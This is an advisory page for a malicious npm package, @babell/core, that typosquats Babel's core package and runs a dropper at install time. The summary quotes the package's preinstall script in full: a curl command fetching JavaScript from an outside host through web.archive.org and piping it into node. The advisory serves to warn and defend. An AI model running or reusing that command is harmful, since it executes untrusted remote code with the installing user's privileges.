@babell/core@8.0.6
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC
OSV ID
MAL-2026-17497
Ecosystem
npm
Summary
The package's package.json defines a preinstall lifecycle script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, downloading a JavaScript file from a third-party host (gitflic.ru/hellscripter, fetched through web.archive.org) and piping it directly into Node for execution at install time. The content fetched is unpinned, served from a non-publisher host unrelated to Babel, and executed with the privileges of the installing user. The package name @babell/core differs from the legitimate @babel/core by a single character, and its description, author, repository, homepage, and README all impersonate the real Babel project, serving as a delivery vehicle for the dropper.
Source: amazon-inspector (ae256b9ff55b98040ea9cb6561edfe1c4e2db94bd111fb19a449651bd6b5d44b)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.